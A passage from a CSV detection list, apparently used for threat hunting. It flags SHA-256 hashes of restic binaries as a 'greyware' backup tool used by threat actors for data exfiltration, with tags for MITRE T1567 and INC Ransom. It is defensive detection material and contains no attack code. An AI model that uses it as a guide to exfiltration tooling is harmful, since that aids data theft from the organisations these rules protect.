Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c816973d0005248a7c6112026d9fa942e8e755748f60fd4a7b0b5ca4d578bd74*",".{0,1000}c816973d0005248a7c6112026d9fa942e8e755748f60fd4a7b0b5ca4d578bd74.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c83782cfec55c5787d0a2f1dbaa3e4fb36eed7c164036fcabc1813ab314f1932*",".{0,1000}c83782cfec55c5787d0a2f1dbaa3e4fb36eed7c164036fcabc1813ab314f1932.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c87e364b795ed06a18e5d54ac07ab31d11f343d66bdb5779df4d48ad915850a1*",".{0,1000}c87e364b795ed06a18e5d54ac07ab31d11f343d66bdb5779df4d48ad915850a1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*c8da7350dc334cd5eaf13b2c9d6e689d51e7377ba1784cc6d65977bd44ee1165*",".{0,1000}c8da7350dc334cd5eaf13b2c9d6e689d51e7377ba1784cc6d65977bd44ee1165.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*c933ac96b502a02dbac31a1b1e08cd9e950274b9cfeae80eef0ef59a1157aa48*",".{0,1000}c933ac96b502a02dbac31a1b1e08cd9e950274b9cfeae80eef0ef59a1157aa48.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ca5a7ecdd5f4a8c6315555fb446496b2085137d6d38e56a0d1318c5e1d80db1a*",".{0,1000}ca5a7ecdd5f4a8c6315555fb446496b2085137d6d38e56a0d1318c5e1d80db1a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*cad474e11c4a63c30d9807392c649acf15736fcb729e1a42f1b63a1a062ef62a*",".{0,1000}cad474e11c4a63c30d9807392c649acf15736fcb729e1a42f1b63a1a062ef62a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*cb5044ef22deef19afcaa1d37da6d2d1e89a21f5cff3e77ad7c47ad8da1a8a7b*",".{0,1000}cb5044ef22deef19afcaa1d37da6d2d1e89a21f5cff3e77ad7c47ad8da1a8a7b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*cc53f743f393cd710a36b8842793843a08b102b603213f0ef43b58c19ff01147*",".{0,1000}cc53f743f393cd710a36b8842793843a08b102b603213f0ef43b58c19ff01147.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*cc90db8e72fb9f65c61b95463c245e7836a8fd7ac375b79dc1b01d2bff1a5bd6*",".{0,1000}cc90db8e72fb9f65c61b95463c245e7836a8fd7ac375b79dc1b01d2bff1a5bd6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*cc99b5463667c5a85d430ad159b1780d63b61d4bdd08b56f5ecabdb264679408*",".{0,1000}cc99b5463667c5a85d430ad159b1780d63b61d4bdd08b56f5ecabdb264679408.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ccb0d8983c1937aded1f217dd002be4ee9d274cbd0e775d596767ca3954090cc*",".{0,1000}ccb0d8983c1937aded1f217dd002be4ee9d274cbd0e775d596767ca3954090cc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ccc327a0e562c42e1067d7082e00d89bb37bb5baf5433c0c775ae8dbf2a6463d*",".{0,1000}ccc327a0e562c42e1067d7082e00d89bb37bb5baf5433c0c775ae8dbf2a6463d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ccefaabe2451d9b11d6fb57bd449b60526a760b6ed92bc6bf3614858dbb861d6*",".{0,1000}ccefaabe2451d9b11d6fb57bd449b60526a760b6ed92bc6bf3614858dbb861d6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*cd4a93475e0410a506f0453e5b884b2b31f64d0ea65f287c97b34737232b2768*",".{0,1000}cd4a93475e0410a506f0453e5b884b2b31f64d0ea65f287c97b34737232b2768.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*cdd52658f4836d8767e267931a90bd187a8d81c4a0df548cf0c4056bd5fa73fa*",".{0,1000}cdd52658f4836d8767e267931a90bd187a8d81c4a0df548cf0c4056bd5fa73fa.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*cf22ddc0de9ed5121eea525f5a701fbf7581b515372884d3c27c6ab6becb7d92*",".{0,1000}cf22ddc0de9ed5121eea525f5a701fbf7581b515372884d3c27c6ab6becb7d92.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*cf7f543c3e8144b822f184d610284ef2986e9a9fe4482c377e71d7de0eee6336*",".{0,1000}cf7f543c3e8144b822f184d610284ef2986e9a9fe4482c377e71d7de0eee6336.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*cffe4f305bd8e92604ee54b41ecf0f280756c25ca65170e1e8da031a3e269745*",".{0,1000}cffe4f305bd8e92604ee54b41ecf0f280756c25ca65170e1e8da031a3e269745.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*d0cb6aee67e6002397f2a03aad19364e456d597ca2c632087530d19c8620e0b2*",".{0,1000}d0cb6aee67e6002397f2a03aad19364e456d597ca2c632087530d19c8620e0b2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*d0f33de8e813474ae320912f13a929d763aa012d38c706fb76a46d9c7212f7f5*",".{0,1000}d0f33de8e813474ae320912f13a929d763aa012d38c706fb76a46d9c7212f7f5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*d1082f06795f50679df66d5bb31b29f7d02e7932ae0da48a972edbfcc067be90*",".{0,1000}d1082f06795f50679df66d5bb31b29f7d02e7932ae0da48a972edbfcc067be90.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*d166b7b1c5a74e9b9b4de99113c7a8e563a782d17664c2ffbb7e721df1062ef5*",".{0,1000}d166b7b1c5a74e9b9b4de99113c7a8e563a782d17664c2ffbb7e721df1062ef5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*d18c1c2f4445bacac3a8bb9bf32d450a25028a7c94b30a1bc040942a5b47f661*",".{0,1000}d18c1c2f4445bacac3a8bb9bf32d450a25028a7c94b30a1bc040942a5b47f661.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*d20f3e5c4081117ace9966329f8460b8c24ff862794a98233b4b23024b9efe58*",".{0,1000}d20f3e5c4081117ace9966329f8460b8c24ff862794a98233b4b23024b9efe58.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*d286f6313ade8206ad883cc2c55605964dbf469524cec7116a736d11d389eac9*",".{0,1000}d286f6313ade8206ad883cc2c55605964dbf469524cec7116a736d11d389eac9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*d3afed5d69df35d875e4243cd45f9f539a69c48c8f19f9e59ecc4b2422dfdb4e*",".{0,1000}d3afed5d69df35d875e4243cd45f9f539a69c48c8f19f9e59ecc4b2422dfdb4e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*d3ebd06d4b88d5e4393e19b093fc74c773cd41db3d3a04662864934d5cf7dd05*",".{0,1000}d3ebd06d4b88d5e4393e19b093fc74c773cd41db3d3a04662864934d5cf7dd05.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*d40270cb6d23e194a1ecb483a41ed42d9edf803b6c207b7599ff5813036f5e5e*",".{0,1000}d40270cb6d23e194a1ecb483a41ed42d9edf803b6c207b7599ff5813036f5e5e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*d4b4b82d0662242a987ebeb97286034aaebfff210180986e023a56513a1a300f*",".{0,1000}d4b4b82d0662242a987ebeb97286034aaebfff210180986e023a56513a1a300f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*d4c1b56d9fb1ef2a6e3f9475a9a0ef9fa822a3e47dff1c3ca4ddba2b3ff0e68b*",".{0,1000}d4c1b56d9fb1ef2a6e3f9475a9a0ef9fa822a3e47dff1c3ca4ddba2b3ff0e68b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*d5306863ae3c851f030b46f8a01db4595170dc8a875bf7e527d697ae122ae1bd*",".{0,1000}d5306863ae3c851f030b46f8a01db4595170dc8a875bf7e527d697ae122ae1bd.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*d736a57972bb7ee3398cf6b45f30e5455d51266f5305987534b45a4ef505f965*",".{0,1000}d736a57972bb7ee3398cf6b45f30e5455d51266f5305987534b45a4ef505f965.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*d7eee6b4038ca7d25bd062a2fabcf5d2c5683a9e59623d6a6a25472ed877f78f*",".{0,1000}d7eee6b4038ca7d25bd062a2fabcf5d2c5683a9e59623d6a6a25472ed877f78f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*d885e7309ccdb44151ee091e2b75c54cdcb02b701ff6e4de6217afad5eb30e6e*",".{0,1000}d885e7309ccdb44151ee091e2b75c54cdcb02b701ff6e4de6217afad5eb30e6e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*d90e2fb20e7db4b605b0de5eac4f830f38f94fc2093cca54cb6eb7b4c46d68fa*",".{0,1000}d90e2fb20e7db4b605b0de5eac4f830f38f94fc2093cca54cb6eb7b4c46d68fa.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*dae5e6e39107a66dc5c8ea59f6f27b16c54bd6be31f57e3281f6d87de30e05b0*",".{0,1000}dae5e6e39107a66dc5c8ea59f6f27b16c54bd6be31f57e3281f6d87de30e05b0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*db351869cc3fdf6b88678f72515adc4ce5600462880100306d5597eb3e2ed516*",".{0,1000}db351869cc3fdf6b88678f72515adc4ce5600462880100306d5597eb3e2ed516.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*db9de96c8020db93542e0abe95168831257d9ab6e68ff0430e28deb019e31640*",".{0,1000}db9de96c8020db93542e0abe95168831257d9ab6e68ff0430e28deb019e31640.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*dba96683300231f309727df9f7aa6648bd50d67ae0babf6c3304ab212bd40d39*",".{0,1000}dba96683300231f309727df9f7aa6648bd50d67ae0babf6c3304ab212bd40d39.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*dd420764e615be9eeca958d60c1adf0e7ed806d2de93f9638b5af105ffd7f007*",".{0,1000}dd420764e615be9eeca958d60c1adf0e7ed806d2de93f9638b5af105ffd7f007.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*dd518c110de3900f1df5bc5b042508e85ece12f4906e5868803e1a00fc2aa2ac*",".{0,1000}dd518c110de3900f1df5bc5b042508e85ece12f4906e5868803e1a00fc2aa2ac.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ddf89e5b9fd98708bf83fb8bbfb3c7baed2d5183035bfc0c794507d509235072*",".{0,1000}ddf89e5b9fd98708bf83fb8bbfb3c7baed2d5183035bfc0c794507d509235072.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*ddfa313aa3d4038579635361c32c98d8a885e8e9b7f53224dd0df22b42fa618d*",".{0,1000}ddfa313aa3d4038579635361c32c98d8a885e8e9b7f53224dd0df22b42fa618d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*de63f778f0650db9c0c00c3772d7f87a6c21ca64e1249e55392ecbeb9bc352a3*",".{0,1000}de63f778f0650db9c0c00c3772d7f87a6c21ca64e1249e55392ecbeb9bc352a3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*dea0f108ba1485baca081dcb34a83c472a0bfa75e4f8483d3c2fce06229fb06b*",".{0,1000}dea0f108ba1485baca081dcb34a83c472a0bfa75e4f8483d3c2fce06229fb06b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*def06c3e5b0c881be0f66be65c9e78fd8d867d42acc12e60a290a6a76c2b4d77*",".{0,1000}def06c3e5b0c881be0f66be65c9e78fd8d867d42acc12e60a290a6a76c2b4d77.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*def48c83f905c40247c041df1797df5ee70a2b233f15f559df160960edbb150f*",".{0,1000}def48c83f905c40247c041df1797df5ee70a2b233f15f559df160960edbb150f.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*df0a51bf7623a3d0c67f707feb0a086fd15d08a6e0413392fca280e540854fce*",".{0,1000}df0a51bf7623a3d0c67f707feb0a086fd15d08a6e0413392fca280e540854fce.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*df278eebd151b6ff62ceae968e3a4203a58d447712ec3fdb62551b25299a61e1*",".{0,1000}df278eebd151b6ff62ceae968e3a4203a58d447712ec3fdb62551b25299a61e1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*dfd2a510010aa652da30a1d05de760782d9e7dc8598ff9f1f3d4da2d734269cf*",".{0,1000}dfd2a510010aa652da30a1d05de760782d9e7dc8598ff9f1f3d4da2d734269cf.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e028c07ede569edf05373d2f271fa4ae6f4c0ecfed56c1c22d46b1b3c85a34df*",".{0,1000}e028c07ede569edf05373d2f271fa4ae6f4c0ecfed56c1c22d46b1b3c85a34df.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e0dca6ebd175563726b1a7f83614b53194a8945421241b3b2fba18784bc4db7a*",".{0,1000}e0dca6ebd175563726b1a7f83614b53194a8945421241b3b2fba18784bc4db7a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e1167085d98313b940710377908862a133a471e476163d929b16fe74efee5356*",".{0,1000}e1167085d98313b940710377908862a133a471e476163d929b16fe74efee5356.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e11bbacc2254a1aaf69807117f5dd21bba924ff5dba6bff978a401bfee10640c*",".{0,1000}e11bbacc2254a1aaf69807117f5dd21bba924ff5dba6bff978a401bfee10640c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e124760dda781a328d0ca851b38a124eff12f1814fa4b70458565c69b546559d*",".{0,1000}e124760dda781a328d0ca851b38a124eff12f1814fa4b70458565c69b546559d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*e1aad78efc4a500f13014eacfd687f10060d703e896efd1c60930e3167e4d2ff*",".{0,1000}e1aad78efc4a500f13014eacfd687f10060d703e896efd1c60930e3167e4d2ff.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e1d81195194f684a0df34da1b4ff305d1c033283521c02f36a6f5cdeffcd6f2d*",".{0,1000}e1d81195194f684a0df34da1b4ff305d1c033283521c02f36a6f5cdeffcd6f2d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e22208e946ede07f56ef60c1c89de817b453967663ce4867628dff77761bd429*",".{0,1000}e22208e946ede07f56ef60c1c89de817b453967663ce4867628dff77761bd429.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e245d857b943531a9617677179564e03675f992c6e4b6876090279b1fa8f3e7c*",".{0,1000}e245d857b943531a9617677179564e03675f992c6e4b6876090279b1fa8f3e7c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e27f8c61205a5fa71ce1d1dc4f3a79f10d58ec2fd7f05b07c26a4742beaf4edc*",".{0,1000}e27f8c61205a5fa71ce1d1dc4f3a79f10d58ec2fd7f05b07c26a4742beaf4edc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e35620841c35cc70619f963842c207107b9c52217e4c807c72178181ad5e3695*",".{0,1000}e35620841c35cc70619f963842c207107b9c52217e4c807c72178181ad5e3695.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e369b92cecfa897281c727a565a81ce86ab629088bde9d95d690ad86284713ef*",".{0,1000}e369b92cecfa897281c727a565a81ce86ab629088bde9d95d690ad86284713ef.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e373f4331ba91d4862d2b9f8646c9e18e20b93445cbe203ed86336cbfccab6d8*",".{0,1000}e373f4331ba91d4862d2b9f8646c9e18e20b93445cbe203ed86336cbfccab6d8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 